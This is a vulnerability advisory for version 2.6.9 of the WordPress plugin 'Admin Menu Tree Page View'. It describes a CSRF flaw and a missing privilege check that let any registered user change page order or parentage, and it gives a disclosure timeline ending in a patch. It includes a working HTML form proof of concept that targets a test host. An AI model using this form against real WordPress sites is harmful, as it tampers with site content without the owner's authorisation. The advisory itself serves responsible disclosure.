Admin Menu Tree Page View [CSRF, Privilege Escalation]
Description
Plugin implements AJAX action admin_menu_tree_page_view_move_page which calls back the function admin_menu_tree_page_view_move_page. The later does not implement any anti-CSRF controls or security checks.
Exploiting this vulnerability a malicious actor can only change the order and/or parent of specified pages, so the damage is minimal.
The AJAX action is a privileged one so it’s only available for registered users. Even so it doesn’t implement any capabilities checks so it’s available to all users no matter the access level. This could allow any registered user to change pages order and/or parent.
Exploiting this vulnerability could lead to a minor data integrity loss but considering the complexity of the attack and the real outcome for an attacker, the exploitation of this vulnerability seems rather unlikely to occur.
PoC
Use the following form to change the order or the parent of pages.
<form method="post" action="http://wp-plugin-csrf.dev/wp-admin/admin-ajax.php">
<input type="hidden" name="action" value="admin_menu_tree_page_view_move_page">
<input type="text" name="post_to_update_id" placeholder="page to move">
<input type="text" name="aboveOrNextPostID" placeholder="target page">
<input type="text" name="direction" placeholder="can be one of inside, up or down">
<button type="submit" value="Submit">Submit</button>
</form>
- 12 December 2017
- Pan Vag
- eskapism.se
- wordpress.org
- 2.6.9
- WordPress 4.8.1
- 2017-12-12:
Discovered - 2017-12-23:
Vendor notified using by email - 2018-01-07:
Patch released